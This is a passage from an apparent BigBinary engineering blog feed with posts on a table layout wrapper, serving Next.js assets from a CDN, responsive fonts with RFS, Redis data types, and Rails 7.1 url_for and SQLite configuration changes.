href="https://youtu.be/tmnxx7HZ5bw">Sourcemaps in action within Honeybadger errors</a></li><li><a href="https://youtu.be/AZZWDMRuuY8">Handling CDN based application bundles</a></li></ul><p>We've created a YouTube<a href="https://www.youtube.com/playlist?list=PLRpdquznQk7E6UPRx7yyAAJrPYwxXqPS4">playlist</a>of the above videos for easy access.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using TableWrapper to avoid dynamic height calculations]]></title>
       <author><name>Philson Philip</name></author>
      <link href="https://www.bigbinary.com/blog/using-tablewrapper-to-avoid-dynamic-height-calculation"/>
      <updated>2023-12-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-tablewrapper-to-avoid-dynamic-height-calculation</id>
      <content type="html"><![CDATA[<h3>Introduction</h3><p>In <a href="https://neeto.com">neeto</a> products, we use lots of listing pages whichcontain <code>Header</code>, <code>SubHeader</code>, and <code>Table</code> components. The <code>Table</code> componentheight is adjusted by inheriting the height of the wrapper that contains the<code>Table</code> component. One common problem for many developers is the need tocalculate the height of sibling components and adjust the table wrapper heightdynamically. This can often lead to double scroll issues and result in layoutinconsistencies. However, we can resolve this issue by using a generic wrappercomponent called<a href="https://neeto-molecules.neeto.com/?path=/story/tablewrapper--default-wrapper"><code>TableWrapper</code></a>.</p><p>The <code>TableWrapper</code> component serves as a wrapper for a table element. It helpsto avoid the dynamic height calculation and inconsistency in heights for theparent container of the table component.</p><p><code>TableWrapper</code> should be used only with Tables used in the listing layout asshown below. <code>Container</code> should be the parent component of <code>TableWrapper</code>.</p><pre><code class="language-javascript">&lt;Container&gt;  &lt;Header /&gt;  &lt;SubHeader /&gt;  &lt;TableWrapper&gt;    &lt;Table columnData={columnData} rowData={rowData} /&gt;  &lt;/TableWrapper&gt;&lt;/Container&gt;</code></pre><p><img src="/blog_images/2023/using-tablewrapper-to-avoid-dynamic-height-calculation/tablewrapper-without-pagination.png" alt="Tablewrapper without pagination"></p><p><a href="https://codesandbox.io/s/using-tablewrapper-without-pagination-8w3gur">CodeSandbox Demo</a></p><p><code>TableWrapper</code> is a Flexbox CSS layout model designed to provide a moreefficient way of arranging and aligning elements within a container. Iteliminates the need for complicated height calculations and offers a flexibleand intuitive approach to building responsive designs.</p><p>One of the major advantages of using Flexbox is that it allows you to createlayouts without relying on dynamic height calculations. Traditionally, whenworking with CSS, you often need to calculate and set heights for elements toensure they align properly. This becomes especially challenging when dealingwith varying content lengths or responsive designs.</p><p>Flexbox solves this problem by providing a set of properties that control thedistribution and alignment of elements within a container. Instead of settingexplicit heights, you can let Flexbox handle the vertical alignmentautomatically based on the content and container dimensions.</p><h3>Key Flexbox properties for height control</h3><ol><li><p><code>display: flex;</code>: By applying this property to the container, you activatethe Flexbox layout model. It transforms the container into a flex container,allowing you to control the behaviour of its child elements.</p></li><li><p><code>flex-direction: row/column;</code>: This property defines the direction in whichthe flex items are laid out within the container. By default, it is set torow, which arranges the items horizontally. However, you can also set it tocolumn to create a vertical arrangement.</p></li><li><p><code>align-items: flex-start/center/flex-end;</code>: This property aligns the flexitems along the cross-axis of the container. Setting it to flex-start alignsthe items at the top, center aligning them in the middle, and flex-endaligning them at the bottom.</p></li><li><p><code>flex-grow: 1;</code>: This property allows the flex items to grow and occupy theavailable space within the container. Setting it to 1 ensures that the itemsexpand to fill any remaining space vertically.</p></li><li><p><code>min-height: 0;</code>: The min-height CSS property sets the minimum height of anelement. It prevents the used value of the height property from becomingsmaller than the value specified for min-height.</p></li></ol><h3>Benefits of using Flexbox for height control</h3><ol><li><p><strong>Simplified Layouts</strong>: Flexbox eliminates the need for complex heightcalculations, making your CSS code simpler and easier to maintain.</p></li><li><p><strong>Responsive Design</strong>: Flexbox naturally adapts to different screen sizes andorientations, providing a responsive layout without the need for mediaqueries or explicit height adjustments.</p></li><li><p><strong>Dynamic Content</strong>: Flexbox handles varying content lengths effortlessly.Whether you have short or long content, the items will adjust their heightaccordingly, ensuring a consistent and visually pleasing design.</p></li><li><p><strong>Cross-browser Compatibility</strong>: Flexbox is well-supported by modernbrowsers, including all major ones, ensuring consistent behaviour acrossdifferent platforms.</p></li></ol><pre><code class="language-html">&lt;div class=&quot;layout__wrapper&quot;&gt;  &lt;div class=&quot;layout__container&quot;&gt;    &lt;!-- Table component --&gt;  &lt;/div&gt;&lt;/div&gt;</code></pre><pre><code class="language-css">.layout__wrapper {  display: flex;  flex-direction: column;  flex-grow: 1;  width: 100%;  min-height: 0;  overflow: auto;}.layout__container {  flex-grow: 1;  min-height: 0;}</code></pre><h3>Using TableWrapper with table contains pagination</h3><p><code>TableWrapper</code> height is adjusted to contain pagination element using the<code>hasPagination</code> prop. <code>hasPagination</code> prop accepts boolean value. It can becalculated using <code>totalCount</code> and <code>defaultPageSize</code> values as shown below.</p><pre><code class="language-javascript">&lt;Container&gt;  &lt;Header /&gt;  &lt;SubHeader /&gt;  &lt;TableWrapper hasPagination={totalCount &gt; defaultPageSize}&gt;    &lt;Table columnData={columnData} rowData={rowData} /&gt;  &lt;/TableWrapper&gt;&lt;/Container&gt;</code></pre><p><img src="/blog_images/2023/using-tablewrapper-to-avoid-dynamic-height-calculation/tablewrapper-with-pagination.png" alt="Tablewrapper with pagination"></p><p><a href="https://codesandbox.io/s/using-tablewrapper-with-pagination-z28evs">CodeSandbox Demo</a></p>]]></content>
    </entry><entry>
       <title><![CDATA[Serving assets and images in Next.js from a CDN without Vercel]]></title>
       <author><name>Akash Srivastava</name></author>
      <link href="https://www.bigbinary.com/blog/serving-nextjs-assets-images-cdn"/>
      <updated>2023-11-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/serving-nextjs-assets-images-cdn</id>
      <content type="html"><![CDATA[<p><a href="https://neetocourse.com">NeetoCourse</a> allows you to build and sell coursesonline. <a href="https://courses.bigbinaryacademy.com/">BigBinary Academy</a> runs onNeetoCourse. NeetoCourse uses Next.js to build its pages.</p><p>If one uses Vercel to deploy a Next.js application, Vercel<a href="https://nextjs.org/docs/app/building-your-application/deploying#managed-nextjs-with-vercel">automatically configures a global CDN</a>.However, NeetoCourse is hosted at<a href="https://neetodeploy.com/neetodeploy">NeetoDeploy</a>, our own app deploymentplatform. This meant we had to figure out how to serve assets and images from aCDN. We like using Cloudflare for various things, and we decided to useCloudflare as the CDN for this case.</p><p>There are two kinds of files in a server-side rendered Next.js app that can beserved from a CDN.</p><ul><li>Assets like server-rendered HTML, CSS, JS, and fonts.</li><li>Public media like images and videos. These typically reside in the publicfolder.</li></ul><h2>Server rendered assets</h2><p>When Next.js is deployed in production, then during the <code>next build</code> step allserver rendered assets are put in <code>.next/static/</code> folder. Next.js provides anoption to set a CDN to serve these assets. This can be done by setting the<code>assetPrefix</code> property in <code>next.config.js</code>, where <code>ASSET_HOST</code> is an environmentvariable that contains the CDN url.</p><pre><code class="language-js">/* next.config.js */...const assetHost = process.env.ASSET_HOST;const nextConfig = {  ...  assetPrefix: isPresent(assetHost) ? assetHost : undefined,  ...};module.exports = nextConfig;</code></pre><p><a href="https://nextjs.org/docs/app/api-reference/next-config-js/assetPrefix">The official doc</a>has more details about it.</p><h3>Result</h3><p>As shown in the pic below, we had a cache hit. It means the assets are beingserved from the configured CDN.</p><p><img src="/blog_images/2023/serving-nextjs-assets-images-cdn/cache-hits-assets.png" alt="Cache HITs on server rendered assets"></p><h2>Public media</h2><p>Next.js has<a href="https://nextjs.org/docs/pages/api-reference/components/image"><code>&lt;Image&gt;</code></a>component that comes with out-of-the-box necessary optimizations. If we coulduse <code>&lt;Image&gt;</code> tag then our CDN problem would also be solved. However the<code>&lt;Image&gt;</code> component<a href="https://github.com/vercel/next.js/discussions/18739">does not work well with Tailwind CSS</a>,and we rely heavily on Tailwind CSS.</p><p>Therefore, we loaded images from the public folder using the traditional <code>&lt;img&gt;</code>tag.</p><pre><code class="language-jsx">import React from &quot;react&quot;;import dottedBackground from &quot;public/index-dotted-bg&quot;;const HeaderImage = () =&gt; (  &lt;img    alt=&quot;dotted background&quot;    className=&quot;m-0 w-20 md:w-40 lg:w-auto&quot;    src={dottedBackground}  /&gt;);</code></pre><p>However now images are not optimized by Next.js and are served from the serverdirectly. This is because Next.js<a href="https://nextjs.org/docs/app/api-reference/next-config-js/assetPrefix#:~:text=Files%20in%20the%20public%20folder%3B%20if%20you%20want%20to%20serve%20those%20assets%20over%20a%20CDN%2C%20you%27ll%20have%20to%20introduce%20the%20prefix%20yourself">does not consider</a>media in public folder as static assets to be sent to CDN.</p><h3>Configuring CDN</h3><p>Since we had already set up and configured a CDN using Cloudflare, we set up autil to prefix the source with our asset host if it is present in the appenvironment.</p><pre><code class="language-js">import { isNotNil } from &quot;ramda&quot;;export const prefixed = src =&gt;  src.startsWith(&quot;/&quot;) &amp;&amp; isNotNil(process.env.ASSET_HOST)    ? `${process.env.ASSET_HOST}${src}`    : src;</code></pre><p>Now we can use <code>prefixed</code> in the <code>&lt;img&gt;</code> tag.</p><pre><code class="language-jsx">import React from &quot;react&quot;;import { prefixed } from &quot;utils/media&quot;;const HeaderImage = () =&gt; (  &lt;img    alt=&quot;dotted background&quot;    className=&quot;m-0 w-20 md:w-40 lg:w-auto&quot;    src={prefixed(&quot;/index-dotted-bg.svg&quot;)}  /&gt;);</code></pre><p>We expected that with this configuration, if <code>ASSET_HOST</code> value was set up thenthe images would be served from the CDN. Otherwise, they would be served fromthe server.</p><p>The images did load correctly, but the CDN was not able to cache them. All ofthe requests resulted in <strong>cache misses</strong>.</p><p><img src="/blog_images/2023/serving-nextjs-assets-images-cdn/cache-misses-images.png" alt="Cache MISSes on server rendered images"></p><h3>Solution</h3><p>The CDN was not able to cache the images because the <code>Cache-Control</code> header wasnot set on the images. This header is set by Next.js when the assets are servedfrom the <code>.next/static/</code> folder, but not when they are served from the <code>public</code>folder. In such cases, we have to explicitly configure the header to be sentwhen a request is made from the CDN.</p><p>So, we ended up adding a custom <code>headers</code> block to the <code>next.config.js</code>.</p><pre><code class="language-js">/* next.config.js */...const nextConfig = {  ...  headers: async () =&gt; [    {      source: &quot;/:all*(.png|.jpg|.jpeg|.gif|.svg)&quot;,      headers: [        {          key: &quot;Cache-Control&quot;,          value: &quot;public, max-age=31536000, must-revalidate&quot;,        },      ],    },  ],  ...};module.exports = nextConfig;</code></pre><p>This worked. All subsequent requests from the CDN for public images turned into<strong>cache hits</strong>.</p><h3>Result</h3><p><img src="/blog_images/2023/serving-nextjs-assets-images-cdn/cache-hits-images.png" alt="Cache HITs on server rendered images"></p><h2>Conclusion</h2><ul><li>Use <code>assetPrefix</code> option in <code>next.config.js</code> to serve server-rendered assetsfrom a CDN.</li><li>Explicitly set <code>Cache-Control</code> header in <code>next.config.js</code> and ensure image srcURLs contain the CDN asset host to serve public images from a CDN.</li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Perfecting mobile responsiveness on NeetoSite using RFS]]></title>
       <author><name>Praveen Murali</name></author>
      <link href="https://www.bigbinary.com/blog/perfecting-mobile-responsiveness-on-neetosite-using-rfs"/>
      <updated>2023-11-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/perfecting-mobile-responsiveness-on-neetosite-using-rfs</id>
      <content type="html"><![CDATA[<p>&lt;style&gt;table{table-layout:fixed;width: auto !important;}table td,table th{padding:4px 12px !important;}&lt;/style&gt;</p><h3>Introduction</h3><p>Responsive design has become fundamental to modern web development as usersaccess websites from various devices with varying screen sizes.<a href="https://www.neeto.com/neetosite">NeetoSite</a> is a website-building tool by<a href="https://www.neeto.com/">Neeto</a>. We strive for a great user experience on alldevices for sites built using NeetoSite.</p><p>This blog will discuss implementing responsive typography, padding, and marginusing the RFS package.</p><p>At NeetoSite, users can personalize font sizes from the design page. If a userselects the largest font size (<code>9xl</code>) for the <strong>title</strong>, everything looksflawless on the desktop view. However, when switching to mobile, things start tolook a little off. The title appears out of place, and that's because we hadbeen using the same font size for both desktop view and mobile view.</p><p><strong>Desktop view</strong></p><p>&lt;img alt=&quot;desktop view&quot; src=&quot;/blog_images/2023/perfecting-mobile-responsiveness-on-neetosite-using-rfs/desktop.png&quot;&gt;</p><p>&lt;br&gt;</p><p><strong>Mobile view</strong></p><p>&lt;div style=&quot;width:100%;max-width:450px;&quot;&gt;&lt;img alt=&quot;mobile view&quot; src=&quot;/blog_images/2023/perfecting-mobile-responsiveness-on-neetosite-using-rfs/mobile.png&quot;&gt;&lt;/div&gt;</p><h3>Limitations of the Tailwind approach</h3><p>We use Tailwind CSS to create the building blocks of NeetoSite. One way toimplement responsive typography is to use<a href="https://tailwindcss.com/docs/font-size#breakpoints-and-media-queries">Tailwind's responsive font size classes</a>.</p><p>For example, to make the text <code>60px</code> on large desktop screens, we can use the<code>lg:text-6xl</code> class.</p><pre><code class="language-html">&lt;p class=&quot;lg:text-6xl&quot;&gt;Text&lt;/p&gt;</code></pre><p>Now we need to choose the font size for mobile and tablet devices. Let's say wechoose <code>30px</code> for mobile and <code>48px</code> for tablets. We need to add additionalTailwind classes:</p><pre><code class="language-html">&lt;p class=&quot;text-3xl md:text-5xl lg:text-6xl&quot;&gt;Responsive text&lt;/p&gt;</code></pre><ul><li>The <code>text-3xl</code> class makes text <code>30px</code> on mobile.</li><li>The <code>md:text-5xl</code> class will set the font size to <code>48px</code> on tablet devices.</li></ul><p>Now, let's dive into a practical example within NeetoSite. This platformprovides users with the flexibility to customize font sizes for their contentfrom the design page.</p><p><img src="/blog_images/2023/perfecting-mobile-responsiveness-on-neetosite-using-rfs/example.png" alt="example building block"></p><p>NeetoSite offers a total of 13 font size variants, each associated with itsdefault desktop value, as shown in the table below.</p><p>&lt;table class=&quot;font-size-variants-table&quot;&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Font size variant&lt;/th&gt;&lt;th&gt;Font size (Desktop)&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;9xl&lt;/td&gt;&lt;td&gt;4.5rem (72px)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;8xl&lt;/td&gt;&lt;td&gt;3.75rem (60px)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;7xl&lt;/td&gt;&lt;td&gt;3rem (48px)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;6xl&lt;/td&gt;&lt;td&gt;2.5rem (40px)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;5xl&lt;/td&gt;&lt;td&gt;2.25rem (36px)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;4xl&lt;/td&gt;&lt;td&gt;2rem (32px)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;3xl&lt;/td&gt;&lt;td&gt;1.75rem (28px)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;2xl&lt;/td&gt;&lt;td&gt;1.5rem (24px)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;xl&lt;/td&gt;&lt;td&gt;1.25rem (20px)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;lg&lt;/td&gt;&lt;td&gt;1.125rem (18px)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;base&lt;/td&gt;&lt;td&gt;1rem (16px)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;sm&lt;/td&gt;&lt;td&gt;0.875rem (14px)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;xs&lt;/td&gt;&lt;td&gt;0.75rem (12px)&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;</p><p>For each font size variant, <strong>the challenge is to determine the optimal fontsizes for tablets and mobile devices</strong>. Once we have chosen the font sizes formobile and tablet, we need to apply the corresponding Tailwind classes, asmentioned above. It can indeed involve a substantial amount of work and effort,doesn't it?</p><h3>The solution - RFS package</h3><h4>What is RFS?</h4><p>Bootstraps side project <a href="https://github.com/twbs/rfs">RFS</a> is a unit resizingengine that was initially developed to resize font sizes (hence its abbreviationfor Responsive Font Sizes). It's a great tool for creating responsive typographyand layouts, as it automatically calculates the appropriate values based on thedimensions of the browser viewport. Nowadays, RFS is capable of rescaling mostCSS properties with unit values like margin, padding, border-radius, or evenbox-shadow.</p><h4>Using RFS</h4><p>The <code>rfs()</code> mixin provides shorthands for common CSS properties with unitvalues, such as <code>font-size</code>, <code>margin</code>, and <code>padding</code>. This makes it easy to useRFS to create responsive CSS.</p><p>Importantly, we don't need to worry about creating complex media queries toachieve responsive font sizes. RFS handles this for us.</p><p>For example, to set the font size of a <code>.title</code> class to be responsive, youwould use the following Sass code.</p><pre><code class="language-css">.title {  @include font-size(4rem);}</code></pre><p>The above Sass code will generate the following CSS output.</p><pre><code class="language-css">.title {  font-size: calc(1.525rem + 3.3vw);}@media (min-width: 1200px) {  .title {    font-size: 4rem;  }}</code></pre><p>In the generated CSS, the font size is set to <code>calc(1.525rem + 3.3vw)</code>. Thisformula takes a base size of <code>1.525rem</code> and adds <code>3.3%</code> of the viewport width(<code>vw</code>). As the viewport width changes, the font size dynamically adjusts toensure optimal readability and aesthetics. If the viewport width is greater than<code>1200px</code>, the built-in media query in the generated CSS sets the font size backto the user-defined value of <code>4rem</code>.</p><h4>Visualisation</h4><p>The following visualization shows how RFS rescales font sizes based on theviewport width.</p><p>Note that every font size is generated in a combination of <code>rem</code> and <code>vw</code> units,but they are mapped to <code>px</code> in the graph to make it easier to understand.</p><p><img src="/blog_images/2023/perfecting-mobile-responsiveness-on-neetosite-using-rfs/visualisation.png" alt="visualisation"></p><p>The X-axis represents the viewport width in pixels. The Y-axis represents thefont size in pixels. The colored lines represent the different font sizes thatcan be generated using RFS.</p><p>As you can see, the font sizes are scaled down as the viewport width decreases.This ensures that the text is readable on all devices, regardless of the screensize.</p><h3>How we applied RFS on NeetoSite</h3><p>We created custom CSS classes for each font size variants and applied RFS tothem. RFS automatically calculates the appropriate values based on the browserviewport, so the font size scales down pleasingly.</p><pre><code class="language-css">.ns-font-9xl {  @include font-size(4.5rem !important);}.ns-font-8xl {  @include font-size(3.75rem !important);}.ns-font-7xl {  @include font-size(3rem !important);}.ns-font-6xl {  @include font-size(2.5rem !important);}.ns-font-5xl {  @include font-size(2.25rem !important);}.ns-font-4xl {  @include font-size(2rem !important);}.ns-font-3xl {  @include font-size(1.75rem !important);}.ns-font-2xl {  @include font-size(1.5rem !important);}.ns-font-xl {  @include font-size(1.25rem !important);}.ns-font-lg {  @include font-size(1.125rem !important);}.ns-font-base {  @include font-size(1rem !important);}.ns-font-sm {  @include font-size(0.875rem !important);}.ns-font-xs {  @include font-size(0.75rem !important);}</code></pre><p>Similarly we created custom CSS classes for each padding and margin variants andapplied RFS to them.</p><h4>RFS fluid rescaling in action</h4><p><img src="/blog_images/2023/perfecting-mobile-responsiveness-on-neetosite-using-rfs/block.gif" alt="RFS fluid rescaling in action"></p><h3>How RFS transformed NeetoSite</h3><ul><li><p><strong>Improved mobile responsiveness</strong>: With RFS, we were able to effortlessly setresponsive font sizes, paddings, and margins for different screen sizes,ensuring a seamless and visually pleasing experience across devices.</p></li><li><p><strong>Simplified user customization</strong>: Users could continue customizing fontsizes, but now with the added benefit of automatic responsiveness, eliminatingthe burden of setting tablet and mobile values manually.</p></li><li><p><strong>Enhanced readability</strong>: RFS helps ensure that the text remains readable atall screen sizes.</p></li><li><p><strong>Improved consistency</strong>: The use of RFS ensures that the typography, padding,and margin of all NeetoSite blocks are consistent across all devices. This isbecause it scales all of the padding and margin values based on the sameformula.</p></li></ul><p>&lt;div style=&quot;width:100%;max-width:450px;&quot;&gt;&lt;img alt=&quot;difference&quot; src=&quot;/blog_images/2023/perfecting-mobile-responsiveness-on-neetosite-using-rfs/difference.gif&quot;&gt;&lt;/div&gt;</p><h3>See RFS in action</h3><p>Take a look at <a href="https://bigbinaryacademy.com/">BigBinary Academy</a>, a place tolearn coding powered by NeetoSite. Recent changes have brought about asignificant improvement in mobile responsiveness. Another example of successfulRFS implementation can be found at https://neetocode.com, a coding platformbuilt by BigBinary.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Deep Dive into Redis Data Types]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/redis-data-types-deep-dive"/>
      <updated>2023-11-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/redis-data-types-deep-dive</id>
      <content type="html"><![CDATA[<p>Last week, while migrating <a href="https://www.neeto.com/neetogit">NeetoGit's</a>production deployment to <a href="https://www.neeto.com/neetodeploy">NeetoDeploy</a>, wefaced a challenge. The Redis 7 add-on only had a TLS URL in Heroku. We were notable to get the dump in a straightforward manner using redis-cli, since wedidn't have access to the certificates for making a TLS connection. We were ableto connect to the add-on, so we decided to write a script to manually copy allthe keys and values over to the Redis add-on in NeetoDeploy.</p><p>While writing the program, we realized that we'd need a switch-case that checkedwhat data type each key was. We had to search for the get and set methods foreach data type manually while writing the program. Late,r we used the redis-rbgem and was able to get the dump with <code>OpenSSL::SSL::VERIFY_NONE</code>, but we hadstill faced the issue of having to look up what the command was for differentdata types like zset and hash.</p><p>I thought this could be a good opportunity to write a blog post summarizing allthe data types and the commands associated with them. The Redis documentationhas a page about the different data types, but all the commands are notavailable at a single place.</p><h2>Redis key-value database</h2><p>When we say that Redis is a key-value database, there is more to it than whatmeets the eye. Redis keys can store values of several different data types.Redis has a set of commands for each of these different data types to dooperations with them. In this post, well go over the different data types, whatthey are and how we can work with them.</p><h3>What are the different data types?</h3><p>Redis has more than a couple of data types, which can be used to store differentdata based on your needs. These include the following:</p><ul><li><code>String</code> - The basic data type we are all familiar with.</li><li><code>List</code> - An array of strings.</li><li><code>Hash</code> - A collection of key-value pairs, similar to a Ruby <code>Hash</code>.</li><li><code>Set</code> - A collection of unique strings.</li><li><code>Sorted Set</code> - A collection of unique strings maintaining by each stringsscore.</li><li><code>HyperLogLog</code> - Probabilistic estimates of cardinality of large sets.</li><li><code>Stream</code> - An append only log.</li><li><code>Geospatial Index</code> - Data structure for storing geographic coordinates.</li></ul><h3>Checking data type of your keys</h3><p>You can use the <code>TYPE</code> command to check what data type your key is. Once youknow what type your key is, you can use the commands associated with your key'sdata type to interact with it.</p><pre><code>127.0.0.1:6379&gt; TYPE schedulezset</code></pre><h3>Cheatsheet for Redis commands based on data type</h3><p>Each Redis data type has its own set of commands for doing operations with thekey and its value. Here's a quick overview of the basic data types you wouldencounter and some of the basic commands to set, retrieve and delete data fromthem.</p><p><img src="/blog_images/2023/redis-data-types-deep-dive/redis-commands-based-on-data-types.png" alt="A list of Redis commands for doing operations with each data type."></p><p>Read more about the different data types in Redis and all the different commandsthat are available in their<a href="https://redis.io/docs/data-types/">official documentation</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds new option path_params for url_for helper method]]></title>
       <author><name>Neenu Chacko</name></author>
      <link href="https://www.bigbinary.com/blog/url-for-path-params-options"/>
      <updated>2023-11-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/url-for-path-params-options</id>
      <content type="html"><![CDATA[<p>With Rails 7.1, the <code>url_for</code> helper now supports a new option called<code>path_params</code>.</p><p>Prior to Rails 7.1, if you had your routes configured to be scoped under say,<code>user_id</code> as shown below, you would have to explicitly specify the <code>user_id</code> inevery single place where you want to generate a link for the scoped routes, suchas when writing view files.</p><pre><code class="language-ruby">#routes.rbRails.application.routes.draw do  root &quot;articles#index&quot;  scope &quot;:user_id&quot; do    get &quot;/articles&quot;, to: &quot;articles#index&quot;    get &quot;/articles/:id&quot;, to: &quot;articles#show&quot;  end  get &quot;/categories&quot;, to: &quot;categories#index&quot;end</code></pre><pre><code class="language-html">&lt;!-- app/views/articles/index.html.erb --&gt;&lt;a href=&quot;&lt;%= articles_path(user_id: @current_user.id) %&gt;&quot;&gt; Articles &lt;/a&gt;</code></pre><p>This could be solved by updating <code>ApplicationController</code> and overwriting the<code>default_url_options</code> method:</p><pre><code class="language-ruby"># application_controller.rbclass ApplicationController &lt; ActionController::Base  def default_url_options    { user_id: &quot;unique-id&quot; }  endend</code></pre><p>The <code>default_url_options</code> method is used to overwrite and set default optionsfor all the methods based on <code>url_for</code>. However, this meant that all routes,even those that did not belong to the <code>user_id</code> scope, would have the<code>?user_id=unique-id</code> query param added to the end of them, resulting in thefollowing output:</p><pre><code class="language-ruby">articles_path # =&gt; /unique-id/articlescategories_path # =&gt; /categories?user_id=unique-id</code></pre><p>Rails 7.1 fixes this issue with the addition of the <code>path_params</code> option. If youpass a hash of parameters to this key, those parameters will only be used forthe named segments of the route. If they aren't used, they are discarded insteadof being appended to the end of the route as query params.</p><p>With this change, we can implement the <code>default_url_options</code> method as follows:</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base  def default_url_options    { path_params: { user_id: &quot;unique-id&quot; } }  endend</code></pre><p>The <code>url_for</code> helper method will now give you the following output:</p><pre><code class="language-ruby">articles_path # =&gt; /unique-id/articlesarticles_path(user_id: &quot;test-id&quot;) # =&gt; /test-id/articlescategories_path # =&gt; /categoriescategories_path(user_id: &quot;test-id&quot;) # =&gt; /categories</code></pre><p>The view file can now be written as:</p><pre><code class="language-html">&lt;a href=&quot;&lt;%= articles_path %&gt;&quot;&gt; Articles &lt;/a&gt;</code></pre><p>This is very useful in situations where you only want to add a required paramthat is part of the route's URL without introducing unnecessary query params forother routes.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/43770">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 comes with an optimized default SQLite3 adapter connection configuration]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-comes-with-an-optimized-default-sqlite3-adapter-connection-configuration"/>
      <updated>2023-10-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-comes-with-an-optimized-default-sqlite3-adapter-connection-configuration</id>
      <content type="html"><![CDATA[<p>The default SQLite3 Active Record adapter connection configuration has beenupdated in Rails 7.1 to better tune it to work for modern Rails applications.</p><p>Before moving on to the configuration changes, let us understand what a PRAGMA is.<a href="https://www.sqlite.org/pragma.html">PRAGMA</a> is a special kind of SQLstatement(only available in SQLite) which is used to query or manipulate variousaspects of the database's behaviour and configuration.</p><h2>Configuration Changes</h2><h3>1. <code>journal_mode</code> is now set use <code>WAL</code> instead of using the rollback journal</h3><p><a href="https://www.sqlite.org/pragma.html#pragma_journal_mode">journal_mode</a> is aconfiguration setting in SQLite that determines how the database handlestransactions and maintains data integrity in the face of system crashes orunexpected shutdowns. Previously, a brand new Rails application used to use therollback journal with <code>DELETE</code> journal mode. Now it uses a much more efficientjournaling method named Write-Ahead Logging (<code>WAL</code>). Let us understand thedifference between them.</p><p><strong>Rollback journal</strong>: In this implementation, the database engine first recordsthe original unchanged database content in a rollback journal, and the writes aremade directly to the database file. If the system crashes, the rollback journalcan be used to restore the database to the state it was in before thetransaction began. The issue with this approach is that a writer can alter thedatabase or readers can read from the database  but not both at the <strong>same</strong>time.</p><p><strong>Write-ahead logging</strong>: In <code>WAL</code> mode, SQLite maintains a separate write-aheadlog. Instead of writing directly to the database file, changes are written tothe log first. When a reader needs a page of content, it first checks the <code>WAL</code>to see if the page appears there, and if so it pulls in the latest copy of thepage in the <code>WAL</code>. If no copy of the page exists in the <code>WAL</code>, then the page isread from the original database file. So this means readers and writers can worktogether and there is no contention.</p><p><strong>How is the database file made up-to-date with the <code>WAL</code> file?</strong></p><p>SQLite routinely moves the <code>WAL</code> file transactions back into the database. Thisprocess is called checkpointing. By default, SQLite does a checkpointautomatically when the <code>WAL</code> file reaches a threshold size of 1000 pages.</p><p>If a system crash occurs, the last commit record has not been written to the<code>WAL</code> file. Without the commit record, the new data is not considered valid, andthe database simply ignores it.</p><p><code>WAL</code> is a better choice for web applications because of the increasedconcurrency it offers.</p><p><a href="https://fly.io/blog/sqlite-internals-wal/">Here</a> is a nice article on how <code>WAL</code>works under the hood.</p><h3>2. <code>synchronous</code> is now set to <code>NORMAL</code> instead of <code>FULL</code></h3><p>The <a href="https://www.sqlite.org/pragma.html#pragma_synchronous">synchronous</a> pragmacontrols how and when SQLite flushes content to disk. The two common options are<code>FULL</code> and <code>NORMAL</code>, which map to sync on every write and sync every 1000written pages respectively. <code>FULL</code> synchronous is very safe but slow. Whensynchronous is <code>NORMAL</code>, the database engine will sync at the most criticalmoments, but less often than in <code>FULL</code> mode. We trade an aggressive approach todurability for speed.</p><p>The SQLite documentation suggests using <code>NORMAL</code> for applications running in<code>WAL</code> mode.</p><h3>3. <code>journal_size_limit</code> is now capped at 64MB</h3><p>The<a href="https://www.sqlite.org/pragma.html#pragma_journal_size_limit">journal_size_limit</a>pragma tells SQLite how much of the write-ahead log data to keep in the on-diskfile. Previously, it was set to <code>-1</code> which means there was no limit set on thejournal size, which allows it to grow unbounded, thereby potentially affectingread performance. Now it is capped at an appropriate size of 64MB.</p><h3>4. <code>cache_size</code> is now set to 8MB</h3><p>The <a href="https://www.sqlite.org/pragma.html#pragma_cache_size">cache_size</a> pragmasets the maximum number of database disk pages that SQLite will hold in memoryat once, per open database file. The default value was -2000 i.e 2000 bytes.Please note that SQLite interprets a negative value as a byte limit and positivenumber as a page limit. Now the cache_size is set to 2000(pages) with a defaultpage size of 4096 bytes, which means the cache limit is ~8MB.</p><h3>5. <code>mmap_size</code> is now set to 128MB</h3><p>The <a href="https://www.sqlite.org/pragma.html#pragma_mmap_size">mmap_size</a> pragma setsthe maximum number of bytes that are set aside for memory-mapped I/O on a singledatabase. Let us first understand what memory-mapped I/O is.</p><p>Memory-mapped (mmap) 